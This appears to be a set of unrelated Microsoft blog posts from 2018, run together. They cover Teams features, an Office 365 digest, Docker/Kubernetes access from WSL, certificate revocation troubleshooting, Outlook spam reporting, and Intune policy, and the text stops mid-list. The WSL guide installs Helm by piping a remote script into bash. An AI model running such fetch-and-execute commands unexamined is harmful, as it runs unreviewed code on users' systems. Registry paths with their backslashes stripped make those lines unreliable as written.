Cada semana Microsoft Teams va sacando nuevas funcionalidades. Aquí os dejo en el resumen de las que han aparecido en este pasado mes de febrero.

Restaurar un canal borrado.

Esta es una posibilidad que se venía pidiendo desde hace mucho tiempo y por fin está implementada. Desde ahora ya puedes restaurar Teams Channels desde la interfaz. Eso si, no se pueden restaurar canales que hayan sido borrados en un periodo superior a 21 días.

Localización de los datos de Teams desde el Centro de Administración de Office 365.

Ya puedes conocer donde están lubicados tus datos de Teams desde el Panel de Administración.

Acceso anónimo a reuniones.

Permite enviar una invitación de reunión a cualquier persona con un correo válido (Outlook, Gmail.. ) Esta persona recibirá un correo con las instrucciones para unirse a la reunión sin la necesidad de  descargarse el cliente, A no ser que necesiten hacer uso de otras características, como compartir escritorio.

Sala de espera en reuniones donde hay participantes de nuestra empresa.

Los participantes anónimos ahora tienen una sala de espera virtual donde esperar a que la reunión empiece. De esta forma, los organizadores podrán unir a los invitados externos cuando lo deseen.

Iniciar una llamada de Teams desde un enlace.

Ya se puede inciar una llamada de Teams cuando haces click en un link (En una página web, por ejemplo)

Compartir el Historial de Conversación.

Ahora, cuando añades a alguien en un grupo chat, también puedes añadir el historial de conversación. En el momento de añadir un nuevo usuario aparecerán las opciones para poder añadir, o no, el historial.

Silenciar un chat.

Esta característica permite poner en pausa las notificaciones, de manera temporal, para un chat en particular. Seguirás recibiendo mensajes, pero no te aparecerán las alertas. Funciona tanto en conversaciones individuales, grupos y reuniones.

Respuesta rápida a las notificaciones de una conversación.

Ya se puede responder directamente a los mensajes en la misma ventana de notificación.

Novedades en Microsoft Teams en dispositivos Móviles.

Plataforma	Característica	Descripción
Android, iOS	Ocultar chat	Oculta antiguas conversaciones para ordenar la lista de chats. Puedes encontrarlos de nuevo usando la búsqueda.
Android, iOS	Desactivar chat	Silenciar temporalmente conversaciones que no estás siguiendo ahora mismo.
Android, iOS	@mention de chat	Captar la atención de alguien, o de todos los usuarios, con una @mencion en las conversaciones de grupo
Android, iOS	Wiki	Wiki está ahora disponible en teléfono móvil.
Android, iOS, WP	Solución de errores y mejoras generales de rendimiento	Nuevas correcciones  y añadiendo mejoras de rendimiento.

Welcome to the March 25 - 31, 2018 edition of the Office 365 Weekly Digest.

Last week there were ten updates to the Office 365 Roadmap, including several for Outlook and SharePoint, as well as a new Office 365 Assistant chatbot that will be available for FastTrack customers.

A reminder that the Azure Active Directory webinars for April are now open for registration. The online customer immersion experiences continue to fill up quickly, due to limited capacity for each session.

Highlights from last week's blogs include the much-awaited rollout of retention policies in Microsoft Teams, additional details on the new SharePoint Admin Center, and a review of new Office 365 updates and features in March. Information on new SharePoint Online web parts, specifically the Yammer web part, is also provided.

Noteworthy item highlights include the Q & A summary document from the recent SharePoint hub sites AMA, March 2018 updates for Outlook for Windows and iOS, and on-demand viewing of the recent Business Applications Virtual Spring Launch event.

OFFICE 365 ROADMAP

Below are the items added to the Office 365 Roadmap last week:

UPCOMING EVENTS

Azure Active Directory Webinars for April

When: Multiple sessions currently scheduled from April 3 - 25, 2018 | Are you looking to deploy Azure Active Directory quickly and easily? We are offering free webinars on key Azure Active Directory deployment topics to help you get up and running. Sessions include Getting Ready for Azure AD, Managing Partner and Vendor Access Using Azure B2B Collaboration, Introduction to Azure AD B2C, Choosing the Right Authentication Method for Azure AD, and more. Each 1-hour webinar is designed to support IT Pros in quickly rolling out Azure Active Directory features to their organization. All webinars are free of cost and will include an anonymous Q&A session with our Engineering Team. So, come with your questions! Capacity is limited. Sign up for one or all of the sessions today!  Note: There are also some sessions available on-demand.

Productivity Hacks to Save Time & Simplify Workflows

When: Wednesday, April 4, 2018 and Wednesday, April 11, 2018 at 1pm ET | This 90-minute hands-on experience will give you the opportunity to test drive Windows 10, Office 365 and Dynamics 365. A trained facilitator will guide you as you apply these tools to your own business scenarios and see how they work for you. During this interactive session, you will: (1) Discover how you can keep your information more secure without inhibiting your workflow, (2) Learn how to visualize and analyze complex data, quickly zeroing in on the insights you need, (3) See how multiple team members can access, edit and review documents simultaneously, and (4) Gain skills that will save you time and simplify your workflow immediately. Each session is limited to 12 participants, reserve your seat now.

Transforming your business to meet the changing market and needs of your customers

When: Thursday, April 5, 2018 at 12pm and 3pm ET | This 2-hour hands-on experience will give you the opportunity to test drive Windows 10, Office 365 and Dynamics 365. A trained facilitator will guide you as you apply these tools to your own business scenarios and see how they work for you. During this interactive session, you will: (1) Use digital intelligence to build personalized experiences across all customer touchpoints, (2) Improve customer service through a single, unified experience that delivers end-to-end service across every channel, (3) Increase customer satisfaction with intelligent scheduling, native mobile support, and remote asset monitoring to help you get the job done right the first time, and (4) Run your project-based business more productively by bringing people, processes, and automation technology together through a unified experience. Each session is limited to 12 participants, reserve your seat now.

Connecting, Organizing & Collaborating with Your Team

When: Tuesday, April 24, 2018 at 12pm ET | During this session, you will have the opportunity to experience Windows 10, Office 365 and Microsoft's newest collaboration tool: Microsoft Teams. A trained facilitator will guide you as you apply these tools to your own business scenarios and see how they work for you. During this interactive session, you will explore how to use Microsoft Teams and Office 365 to: (1) Create a hub for team work that works together with your other Office 365 apps, (2) Build customized options for each team, (3) Keep everyone on your team engaged, (4) Coauthor and share content quickly, and (5) Gain skills that will save you time and simplify your workflow immediately. Each session is limited to 12 participants, reserve your seat now.

Hands-on with security in a cloud-first, mobile-first world

When: Thursday, April 26, 2018 at 3pm ET | This 2-hour hands-on session will give you the opportunity to try Microsoft technology that secures your digital transformation with a comprehensive platform, unique intelligence, and partnerships. A trained facilitator will guide you as you apply these tools to your own business scenarios and see how they work for you. During this interactive session, you will: (1) Detect and protect against external threats by monitoring, reporting and analyzing activity to react promptly to provide organization security, (2) Protect your information and reduce the risk of data loss, (3) Provide peace of mind with controls and visibility for industry-verified conformity with global standards in compliance, (4) Protect your users and their accounts, and (5) Support your organization with enhanced privacy and compliance to meet the General Data Protection Regulation. Each session is limited to 12 participants, reserve your seat now.

BLOG ROUNDUP

Retention policies for Microsoft Teams

We're proud to announce that we are starting the roll out of retention policies for Microsoft Teams. The roll out is expected to complete within the next few weeks. With this launch, Teams admins can use the Office 365 security and compliance center to set retention policies for Teams and decide proactively whether to retain content or delete content – for the entire organization, specific locations or user or specific teams. This is a key milestone in our efforts to provide IT admins with even more security and compliance functionality in Teams and part of our roadmap to bring the Skype for Business Online capabilities into Teams. We are currently working on releasing eDiscovery for calls and meetings in Teams soon. The next big ticket item on the roadmap would be Data Loss Prevention (DLP) for conversations and files. At the same time, we are also focused on addressing customer feedback on existing key features like eDiscovery of Teams data, Teams audit logs, etc. | Related: New apps in Microsoft Teams - March 2018 Update

New in March–rich data types, intelligent search, and expanded datacenters

This month, we rolled out updates to Office 365 that include the following: (1) new data types in Excel, (2) hub sites, intelligent search and new web parts in SharePoint, (3) the expansion of the Microsoft Cloud with datacenters in new geographies, and (4) general availability of Microsoft 365 for U.S. Government.

Coming soon to the new SharePoint Admin Center

In May 2017 we unveiled our plans to simplify SharePoint administration through delivering an administrative experience that's intuitive, intelligent, and simple. Since then we've made available the new admin experience as Preview for customers who have enabled Targeted Release at the Tenant level. In the next several weeks in our preview we'll be introducing new updates on our journey to deliver an administrative console designed to help IT achieve more, so their users can achieve more. Some of these updates include improvements to site management, custom views, search improvements, and improved email layout. These updates will begin rolling out to Targeted Release in 4 – 8 weeks.

Content and communities: Showcase both in your social intranet

Whether your goal is organization wide engagement or an introduction to a community of interest, adding the power of conversation into your intranet site makes it easy to showcase questions, comments and discussions. We're delighted to announce that the new Yammer web part for SharePoint has moved from targeted release to being generally available, providing an interactive experience on your sites, pages and news. The new web part is a first step into tighter integration in communities, particularly in scenarios where you want broad engagement across your organization. For example, in the leadership connection scenario, where a leader in the organization wants to have a deeper connection with employees but needs to do that at scale. In this case, you have both an intranet site that has rich content assets, documents, news, articles, videos from Stream, highlighted content that is dynamic, even Power BI dashboards. Check out the latest web parts you can easily add to make your content really shine. In addition, you now add conversations from rich, vibrant community in Yammer. | Related: Video: Embed your Yammer conversations in SharePoint sites & pages

Schooling A Sea of Phish Part 2: Enhanced Anti-spoofing technology in Office 365

A few weeks ago, we released new enhanced Anti-impersonation capabilities for Office 365 Advanced Threat Protection (ATP). We're excited to announce Office ATP's enhanced anti-spoofing capability for protecting against spoofed emails from external domains. We believe this new capability will help lead the industry in further securing email. The new feature raises the required level of authentication checks for emails sent into Office 365, helping ensure greater protection for customers. The newest anti-spoof features help protect organizations from external domain spoof. Office 365 honors emails from external domains having proper SPF, DMARC, and DKIM authentication settings enabling them to pass authentication, and junks messages that fail this authentication. The challenge occurs when external domains do not have these settings properly configured.

NOTEWORTHY

Summary: SharePoint Hub Sites Ask Microsoft Anything - March 23, 2018

The Q & A summary document from the SharePoint Hub Sites AMA (Ask Microsoft Anything) session on March 23, 2018 is now available.

Watch the Business Applications spring launch event on-demand

Format: Video (94 mins) | Get a first-hand look at the Spring 2018 Business Applications update to see how modern, intelligent technologies can transform your operations, improve engagement with your customers, and help move your business forward. We provided a look at many of the new capabilities across Dynamics 365, Power BI, and the Business Application Platform and will showcase how these technologies can help drive your digital transformation.

Office 365 for Windows Desktop - March 2018 Release details

On March 27th, 2018, Microsoft released Office for Windows Desktop version 1803 (Build 9126.2116). Our Office International team translated this update into 44 languages. We also developed the updated Translator feature that now appears in Excel and PowerPoint. The Translator functionality has been given a complete overhaul. It now supports 61 languages. Its performance is much improved. The translation quality it produces is the best it has ever been, and it will continue to improve over time. For more information on this release please have a look at the What's New in Office 365 for Windows Desktop section.

Office for Android - March 2018 Release details

On March 15th, 2018, Microsoft released an updated version of Office for Android (Excel, PowerPoint & Word) build 16.0.9126.2069 in 68 languages. Some of the new features available for the first time to Office365 subscribers using Office for Android on their tablet or phone include quickly finding documents stored in frequently used sites and groups in the Open menu across Word, Excel and PowerPoint. For more information please have a look at the What's New for Office 365 Android section.

Your favorite email folders and groups now in Outlook for iOS

With favorite folders or Office 365 Groups, Outlook for iOS helps keep what's most important to you close at hand. Now you can add, remove and reorder favorites right from your mobile device. And whether you manage your favorites groups and folders from Outlook for iOS, Outlook for Windows on your PC -- or even tag a folder as a favorite in Outlook on the Web -- we sync your favorite items across your most used Outlook experiences. Expect to see this update was we roll it out in Outlook for iOS in the coming weeks.

Office 365 Attack Simulator and Mitigating Common Attacks (Part 1)

When it comes to security your best line of defense is one that is reactive versus one that is proactive; however, how do you know how you'll respond to a security incident if one hasn't yet to occur…that's where Attack Simulator in Office 365 shines, it's what sets the security solutions we provide apart from other cloud services. Attack Simulator is designed to put you ahead of curve and keep you in front of the proverbial 8 ball. With Attack Simulator you can run realistic attack scenarios in your organization. This can help you identify and find vulnerable users before a real attack impacts your bottom line. In brief, Attack Simulator as a component of Office 365 Security and Compliance is designed to help you identify issues before they become an issue. It allows you to determine how end users behave in the event of an attack, and update policies to ensure that appropriate security tools are in place to protect your organization from threats.

Here is an update to a previous post with the same name.

https://gallery.technet.microsoft.com/lync/Skype-for-Business-and-aa1c8daa

Many thanks to Luca Vitali for his update. (https://lucavitali.wordpress.com)

Listed below are some great Microsoft Teams resources. I know this one is short, but I wanted to get this information out to you - my ever faithful blogees….

http://aka.ms/skypeandteams

https://products.office.com/en-US/business/office-365-roadmap

http://aka.ms/successwithteams

Have a great day!

Scott

Yesterday I tweeted about me being able to access my Docker for Windows Kubernetes Cluster from Debian WSL without exposing the Docker Daemon with TLS and I got quite some responses.

W00t! I'm able to access my #Docker for Windows #Kubernetes Cluster from #Debian WSL without exposing the #Docker Daemon with TLS. Anyone interested to know how I did this? pic.twitter.com/Dgu3a6aWrO

— Stefan Stranger (@sstranger) April 1, 2018

It seems that there are quite some people interested in me sharing how I was able to do this.

Background information

Let me start with some background information about why I wanted to manage my Docker for Windows Client Kubernetes cluster from (Debian) WSL. Last week I visited an Azure Meetup in Amsterdam where Erik St. Martin talked about Azure Containers.

One of the tools he talked about was Helm. Helm is a package manager for Kubernetes.

Helm

Helm helps you manage Kubernetes applications — Helm Charts helps you define, install, and upgrade even the most complex Kubernetes application.
Charts are easy to create, version, share, and publish — so start using Helm and stop the copy-and-paste madness.

I wanted to play around with Helm on my Docker for Windows Kubernetes Cluster. Please read my earlier blog post called "Running Kubernetes Cluster in Docker for Windows" to learn more on how to get this running on your Windows 10 machine.

There are different version of Helm:

• OSX
• Linux
• Linux 32-bit
• Windows

I tried to install the Windows version of Helm but was not able to get this working. Then I thought I would try to manage my Docker for Windows Kubernetes cluster from (Debian) WSL.

We just released the Debian GNU/Linux for WSL. More information can be found at the following "Debian GNU/Linux for WSL now available in the Windows Store" blog post.

While investigating how I could connect from Debian WSL to my Docker for Windows Kubernetes cluster I stumbled on the following blog post "[Cross Post] WSL Interoperability with Docker" from Craig Wilhite.

By default the Docker Client for Windows offers a configuration to expose the Docker Daemon.

If you enable this configuration you do expose your system to potential attack vectors for malicious code.

And that's where the tool npiperelay can help. This is a tool built by John Starks.

WSL Interoperability with Docker

Please following the steps to install npiperelay, socat, docker client on the blog post from Craig Wilhite.

High-Level I run the following steps:

1. Install npiperelay in Debian WSL
   • Install Aptitude on Debian WSL

     Aptitude is an Ncurses based FrontEnd to Apt, the debian package manager.

     sudo apt-get install aptitude

   • Install Go

     #Make sure we have the latest package lists
     sudo apt-get update

     #Download Go. You should change the version if there's a newer one. Check at: https://golang.org/dl/

     sudo wget https://storage.googleapis.com/golang/go1.10.1.linux-amd64.tar.gz

     #unzip Go

     sudo tar -C /usr/local -xzf go1.10.1.linux-amd64.tar.gz
     #Put it in the path

     export PATH=$PATH:/usr/local/go/bin

   • Build the relay (see the blog post from Craigh Wilhite)
2. Install socat

   sudo aptitiude install socat

3. Install Docker CE for Debian (https://docs.docker.com/install/linux/docker-ce/debian/#install-docker-ce-1)

   sudo aptitude install docker-ce

4. Stitch everything together.

   See blog post Craigh Wilhite.

5. Install kubectl (https://kubernetes.io/docs/tasks/tools/install-kubectl/)
6. Configure kubectl configuration.

   Copy Docker for Windows Kubernetes kube config files to Debian WSL kube configuration folder

   cp -R /mnt/c/Users/[username]/.kube/ ~/

   This will copy the kubernetes cluster configuration created by the Docker for Windows client to the Debian WSL user.

7. Install Helm on Debian WSL
   curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash

You should now be able to access your Docker for Windows Kubernetes cluster from Debian WSL.

#start relay
sudo ~/docker-relay &
#test docker client
docker version
#test access to the Kubernetes cluster
kubectl version
kubectl cluster-info
kubectl get nodes --all-namespaces
kubectl get pods --all-namespaces
#test Helm
helm version
helm list

Have fun!

References:

• Helm
• Running Kubernetes Cluster in Docker for Windows
• Debian GNU/Linux for WSL now available in the Windows Store
• [Cross Post] WSL Interoperability with Docker
• Github npiperelay (allows you to access Windows named pipes from WSL)
• Socat

We’re announcing a new architecture for Exchange Server and Office 365 hybrid customers that unlocks Enterprise Mobility + Security (EMS) capabilities for Outlook for iOS and Android. With Hybrid Modern Authentication, Exchange customers can combine the power of Outlook with Azure Conditional Access and Intune App Protection Policies to securely manage corporate messaging on mobile devices.

Once Exchange customers with servers on-premises establish a hybrid configuration with the Microsoft Cloud and enable Hybrid Modern Authentication with Office 365, Outlook for iOS and Android authenticates against Azure Active Directory and synchronizes the mailbox data in Exchange Online – the Outlook mobile client never connects with the on-premises Exchange environment – unlocking the power of Office 365, Outlook for iOS and Android and Enterprise Mobility + Security (EMS).

Architected in the Microsoft Cloud, Outlook for iOS and Android is fully integrated with Azure Active Directory and Microsoft Intune. This means that organizations can enforce conditional access as well as application and device management policies while experiencing the richness of Outlook for iOS and Android.

Now Exchange Server customers with hybrid modern authentication can use the cloud-backed capabilities of Outlook such as Focused Inbox, Intelligent Search and enhanced time management to achieve more on their mobile device.

A few capabilities of EMS include:

• Selective wipe—Remove corporate email data and leave personal data intact to facilitate a “bring your own device” (BYOD) approach to phones and tablets.
• App restriction policies—Restrict actions such as cut, copy, paste and “save as” between Intune-managed apps and personal apps on a device to reduce the risk of corporate data loss. App restriction policies are available for use on both mobile device management (MDM) enrolled devices and on unmanaged devices, through Intune’s App Protection policies.
• Conditional access—Ensure that your corporate email can only be accessed on phones and tablets that meet secure access policies set by IT such as device or app management policy enforcement or Multi Factor Authentication (MFA) user scenarios. And with Azure Identity Protection capabilities of EMS, you can ensure these conditional access policies grant or deny access based on risks associated with each unique identity.

For the initial roll out, Exchange Server customers can contact their Microsoft account team, customer sales and services (CSS) or technical account managers to initiate the set up and deployment process for this enterprise mobility and security solution with Outlook for iOS and Android.

For more technical information and licensing requirements, see Using Hybrid Modern Authentication with Outlook for iOS and Android.

Ross Smith IV
Principal Program Manager
Office 365 Customer Experience

Applies to:

Windows Server 2008 R2 SP1 + KB3125574

Windows 7 SP1 + KB3125574

Windows Server 2008 R2 SP1 + KB2775511

Windows 7 SP1 + KB2775511

Windows Server 2008 R2 SP1

Windows 7 SP1

If you had installed the March 2018 security updates (KB4088878 & KB4088875) and lost network settings on Windows 7 SP1 and/or Windows Server 2008 R2 SP1.  And if you looking for a fix, here it is.

4099950 Network Interface Card settings can be replaced, or static IP address settings can be lost
https://support.microsoft.com/?id=4099950

Note:  It needs to be installed before KB4088875 and/or KB4088878 are installed.

Yong

Hello Everyone, my name is Zoheb Shaikh and I'm a Premier Field Engineer with Microsoft India. I am back again with another blog and today I'll share with you something interesting that I came across recently which caused the Certificate Authority to go down, and how I was able to isolate the issue by using Process Monitor (Procmon). (https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)

Before I discuss about the issue, I would like to briefly share a bit of background on CDP & AIA extensions and their use.

I could try to explain what the AIA and CDP are and the way to configure it, but here is a short article on it and how revocation works.

https://docs.microsoft.com/en-us/windows-server/networking/core-network-guide/cncg/server-certs/configure-the-cdp-and-aia-extensions-on-ca1

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619730(v=ws.10)

AIA and CDP extensions are very important for certificate validation.  The Authority Information Access or AIA repository host CA Certificates.  This location is "stamped" in the Authority Information Access extension of issued certificates.  A client that is validating a certificate may not have every CA certificate in the chain.  The client needs to build the entire chain to verify that the chain terminates in a self-signed certificate that is trusted (Trusted Root).

CDP extensions host the CRLs that the CA publishes.  The CRL Distribution Points extension is "stamped" in certificates.  Client use this location to download CRLs that the CA Publishes.  When a client is validating a certificate, it will build the chain to a Root CA.  If the Root CA is trusted this means the certificate is acceptable for use.  However, for applications that require revocation checking, the client must also validate that every certificate in the chain (with the exception of the Root) is not revoked.

Coming back to the customer scenario, they had a 2 Tier CA Hierarchy with an Offline Root CA and an Enterprise Subordinate CA both running 2012 R2 and an IIS server hosting the CDP/AIA extensions of Root CA (As shown in the diagram below):

Problem Symptom: When the customer was trying to enroll or issue any certificates, he was getting the following error:

Unable to renew or Enroll certificates getting the error | (The revocation function was unable to check revocation because the revocation server was offline. 0x80092013 (-2146885613 CRYPT_E_REVOCATION_OFFLINE)

The first thing we did was to export a certificate in .cer format and run the command "certutil -verify -urlfetch" against the certificate. As a result, we got the error:

Error retrieving URL: A connection with the server could not be established 0x80072efd (INet: 12029 ERROR_INTERNET_CANNOT_CONNECT)

http://fabricam-ca1.corp.fabrikam.com/vd/Fabricam_Group-CA.crt

We got this error for both CDP and AIA extensions.

When we tried to manually browse these extensions in Internet Explorer, we were able to access them but from the command line (I.e. certutil -verify -urlfetch) it always failed.

ROADBLOCK!!

We ran the same command (certutil -verify -urlfetch) against public certificates and observed similar behavior. And again, we could successfully browse to their CDP & AIA extensions from Internet Explorer.

Upon further checking, we found this behavior was occurring for about 20% of the users.

We checked if there were any proxy settings in IE and found none. CAPI2 logging further confirmed that there were issues with Certificate Revocation checking for both Internal and Public CA's.

Since we were in trouble we decided to collect a Procmon log with a simultaneous network trace, while again running "certutil -verify –urlfetch."

We saw the following in PROCMON:

11:48:25.9643758 PM certutil.exe 2348 TCP Reconnect Fabricam-ca1.corp.fabricam.com: 51188->210.99.197.47:8080 SUCCESS Length: 0, seqnum: 0, connid: 0

We also saw multiple reconnects

Operation > TCP Reconnect > Path > Fabricam-ca1.corp.fabricam.com:51188 -> 210.99.197.47:8080

Under Process Path > C:Windowssystem32certutil.exe >> Command Line > certutil -verify -urlfetch subcacert1.cer

In Network Monitor (Netmon), we observed the following:

676 12:31:35 AM 6/17/2015 9.7827898 0 certutil.exe 10.10.60.47 Some Public IP TCP TCP:Flags=CE....S., SrcPort=52443, DstPort=HTTP Alternate(8080), PayloadLen=0, Seq=1424697589, Ack=0, Win=8192 ( Negotiating scale factor 0x8 ) = 8192 {TCP:125, IPv4:3}

815 12:31:38 AM 6/17/2015 12.7970106 0 certutil.exe 10.10.60.47 Some Public IP TCP TCP:[SynReTransmit #676]Flags=CE....S., SrcPort=52443, DstPort=HTTP Alternate(8080), PayloadLen=0, Seq=1424697589, Ack=0, Win=8192 ( Negotiating scale factor 0x8 ) = 8192 {TCP:125, IPv4:3}

So the requests from the Sub CA were not getting a response from an external IP. Further analyzing the Procmon showed us the following:

11:48:22.9158915 PM certutil.exe 2348 RegQueryValue HKLMSOFTWAREMicrosoftWindowsCurrentVersionInternetSettingsConnections WinHttpSettings SUCCESS Type: REG_BINARY, Length: 45, Data: 28 00 00 00 00 00 00 00 03 00 00 00 19 00 00 00

11:48:22.9159009 PM certutil.exe 2348 RegQueryValue HKLMSOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsConnectionsWinHttpSettings SUCCESS Type: REG_BINARY, Length: 45, Data: 28 00 00 00 00 00 00 00 03 00 00 00 19 00 00 00

11:48:22.9174322 PM certutil.exe 2348 RegQueryValue HKLMSOFTWAREMicrosoftWindowsCurrentVersionInternet SettingsConnectionsWinHttpSettings SUCCESS Type: REG_BINARY, Length: 45, Data: 28 00 00 00 00 00 00 00 03 00 00 00 19 00 00 00

We got the above for the path C:Windowssystem32certutil.exe >> Command line certutil -verify -urlfetch subcacert1.cer.

We found that they had set Proxy settings before using Group Policy preferences, which got tattooed in the registry even though it was not reflected in Internet Explorer.

Thus, we deleted the registry key HKLMSOFTWAREMicrosoftWindowsCurrentVersion Internet SettingsConnectionsWinHttpSettings and then confirmed that the revocation check worked fine for external and internal websites.

Lesson learned from this post? "WHEN IN DOUBT, USE PROCMON"

Hope this helps,

Zoheb

213 Microsoft Team blogs searched, 48 blogs have new articles. 550 new articles found searching from 01-Mar-2018 to 31-Mar-2018

BlogMS-Monthly-Report-March-2018

The email security analysis capabilities in Microsoft Office 365 are unmatched in the industry, offering subscribers the best protection available from email categories such as junk, SPAM, phishing, malicious, etc. But, from time to time a message will slip through that should have been classified as SPAM. If you are a Microsoft Managed Service Provider or a network administrator, the question becomes how do you enable your users to easily report these emails to the Office 365 analysis services?

I have written this blog to describe how you can publish an Outlook add-in (no cost) to the Outlook ribbon for users to simply highlight an email, classify it as Junk or phishing email, and then click to submit. It doesn't get any easier than this! This seems to be a hidden gem that I want to create much more awareness about to our many Microsoft partners and Office 365 administrators. Below are instructions about how to install it on a user workstation to test with, how to administratively install it across all accounts in your Office 365 tenant, as well as how to then monitor for Junk and Phishing messages that have been submitted. While the intent of this article is to describe how to install and report unwanted emails, this Outlook Add-in also enables a user to report email that may have been incorrectly classified (Not Junk).

Although this blog is focused on the Outlook Add-in for reporting SPAM, other useful Add-ins should also be considered for installation such as Translator and Weather. There are hundreds of additional add-ins available for Outlook to review and choose from that may be perfect for your organization!

Additional information about how to submit SPAM, non-spam, and phishing scam messages for analysis are available in this TechNet Link.

Install the Microsoft Junk E-Mail Reporting Add-in for Microsoft Outlook (Single Use/Testing):

Option One: Download and Install

1. Download the Add-In from this site
2. Choose the correct version to download (32-bit or 64-bit)
3. Save the download and install it using a few quick steps in the wizard

Option Two: Install from Microsoft Office Store

1. With Microsoft Outlook open, look in the ribbon bar at the top for an option called Store in the Add-ins category.

2. Click on the Store icon. In the Search add-ins area, enter report message and press enter.
3. Locate the Report Message add-in and click Add.

4. This should take only a few seconds to install. When complete, you may click on the option to Get Started for a brief tutorial in how to use it, or click X to close this area.

Using the Outlook Add-in

1. The new Report Message Add-in will now be visible in the Outlook ribbon bar to begin using no matter what method of installation you chose above.

2. Locate a SPAM message in your Inbox, highlight it, then click on the Report Message drop down option to select if it is Junk or a Phishing message.

3. After the Junk or Phishing classification is chosen, you will see the message below indicating that the email is processing.

4. Within a few seconds the email will be submitted and removed automatically from your Inbox.
5. You may receive a notice with a definition of what Phishing email is and asking you if you "want to send a copy of this message to Microsoft to help the research and improvement of email protection technologies?" Click on Report to submit.
6. To prevent the notice from appearing each time the user submits a SPAM message, the user can click the Report Message Add-in drop down option and select Options.
7. Within the Options area, the user can select to Automatically send reports that will prevent a prompt for each submission.

8. Select Save to save the changes and exit.

Deploy to all Outlook users: How to administratively deploy the Report Message Add-in to all users.

1. Logon to the Office 365 Administrator portal at portal.office.com
2. Under Admin Centers, open Exchange.

3. In the Exchange Admin Center, select Organization on the left.
4. Then, choose Add-ins.
5. In the Add-ins area, you will see several pre-defined items already listed.
6. To choose a new Add-in, click the + icon.
7. Then select to Add from the Office Store

8. In the new website that was just opened, the view is focused on only Add-ins for Outlook. In the upper right, locate the Search the Office Store area. Enter Report Message and press Enter.
   
9. The Report Message app is now displayed. Click on it to view the details.
   

10. In the details of the Add-in, select Add to include it as an Administratively assigned Add-in for your tenant users.

11. Confirm that you want to Add the Add-in by clicking Yes on the notice.
12. Once you receive the message that You've added an Add-in for Outlook, open the tab with the Exchange Admin Add-ins area displayed you were just on.
13. Select the Refresh icon (highlighted below) to verify that the Report Message add-in is now displayed.

14. You will now see that Report Message add-in is listed. But wait! It is Disabled by default. Let's correct that now so users will be able to see and begin using it.
15. In the Add-in list, double click on the Report Message area to open the detailed configuration.
16. Select the option to be Optional, enabled by default. Click Save to complete this step.
17. The list of Add-ins will now show the Report Message Add-in displayed as Enabled under the User Default column.

18. Once complete, the Report Message Add-in (or any other Add-in) may take a few hours to appear. In my test, it took about two hours for my Outlook client to show the Report Message Add-in.

Review User Reported Junk and Phishing Email

As a network administrator you always want to keep your finger on the pulse of your organization to understand just how users are utilizing the services. Now that you have enabled users to report their own junk and phishing emails, you will want to make sure they are using this option. Use the option below to access this area.

1. Logon to portal.office.com
2. Open the Security and Compliance dashboard
3. Under Threat Management (left column area), choose the Dashboard option
4. In this area, look for the section called User-Reported Messages. Click on it to see the number of messages submitted per day, who is submitting, the email subject, sender, sender IP and type of message reported (junk or phishing)

Communicate To Users About Self-Reporting

With this Add-in now enabled, be sure to communicate its existence and capabilities to your Outlook users. With a few simple steps in the instructions (and screen captures), your users will be able to report any Junk and Phishing emails they receive. The more misclassified SPAM messages submitted, the better the services become for everyone!

Summary: In this TechNet blog you have learned about the Outlook Add-in called Report Message that is a hidden gem to all Office 365 organizations. We also stepped through several options to install it as a single instance as well as for all users in the organizations. Finally.

We’ve noticed an issue in Intune, around how files are shared in OneDrive. The reason for this is that OneDrive has changed how files are made available to FileApp. We’re working on fixing the issue but we’re sharing some details with you in this post, so you can be aware of it.

File sharing with Native Mail App
Users can’t share attachments from the native Mail app to OneDrive via FileApp in Mobile Device Management (MDM) managed devices when OneDrive is managed by Intune App Protection (also known as Mobile Application Management- MAM). Access to MAM managed accounts is currently blocked by OneDrive to avoid data leaks through FileApp. We’re working on a solution for this, but it is dependent in part on an Apple bug fix for the Files app not supporting the managed “Open-In” policy.

File access for MAM managed apps
MAM-managed Office apps like Teams, Yammer that do not have OneDrive directly integrated cannot access files from MAM-managed OneDrive. We’re working on a fix for this, involving an SDK change and changes to the OneDrive app, that we expect to ship later this year.

Hope this helps! Let us know if you have any questions.

When I speak with organizations about managing Windows 10 devices with Microsoft Intune there is a concern about disruption of current projects to deploy new OSs, patches, etc.  When moving to Intune for managing Windows devices, Intune will leverage the built-in MDM agent vs. having to install another agent to manage Windows 10 devices.

With modern management of Windows 10, the process of updating and upgrading Windows 10 devices is seen as continual process.  Updating Windows doesn’t have to be seen a massive project, evaluate your current processes for updating Windows and look at updating Windows 10 as an ongoing predictable process for IT and end users.  In addition your users and company benefit from the latest security features built into Windows 10.

Managing Windows policies are also a concern when moving to a newer OS.  Traditionally, configuration policies are managed by Group Policy, however Modern Management of Windows 10 with Microsoft Intune also has a set of policies, even policies that are duplicative of Group Policy (where applicable, not all Group Policies are available via MDM or CSP).  In environments where Group Policies are deployed and managed by Intune there’s the question of which policy wins.  The following describes which policy wins according to Windows 10 version.

• Windows 10 versions 1709 and earlier Group Policy will override MDM policies, even if an identical policy is configured in MDM.

• Windows 10 version 1803 and beyond there is a new Policy CSP setting called ControlPolicyConflict that includes the policy of MDMWinsOverGP, where the preference of which policy wins can be controlled, i.e. Microsoft Intune MDM policy.

For more details about the new ControlPolicyConfict setting please visit: https://docs.microsoft.com/en-us/windows/client-management/mdm/policy-csp-controlpolicyconflict#controlpolicyconflict-mdmwinsovergp

What happens to the policy if the device is unenrolled from Intune?  If applicable, Group Policy will re-apply the policies in this scenario.

Setting up a policy

In the link above, the “scope” of the policy is set for “device” so we’ll need to target the policy at the device scope. 

To learn more about user and device scopes please visit: https://docs.microsoft.com/en-us/windows/client-management/mdm/policy-configuration-service-provider#policy-scope 

Since the ControlPolicyConfict policy applies to the device, we’ll have to utilize the following string: ./Device/Vendor/MSFT/Policy/Config/AreaName/PolicyName to configure the policy. 

 

Next replace AreaName/PolicyName with ControlPolicyConflict/MDMWinsOverGP

After the modification to the string, the policy should look like the following: ./Device/Vendor/MSFT/Policy/Config/ControlPolicyConflict/MDMWinsOverGP

Creating the policy

Let’s create a new policy in Intune to control the GP vs. MDM winner

1. Navigate to portal.azure.com and locate Intune
2. Select “Device configuration à Profiles à Create profile”
3. Under Platform select Windows 10 and later
4. Under Profile type select “custom” and “add”
5. Name the custom setting with something intuitive
6. For OMA-URI add the policy OMA-URI string: ./Device/Vendor/MSFT/Policy/Config/ControlPolicyConflict/MDMWinsOverGP
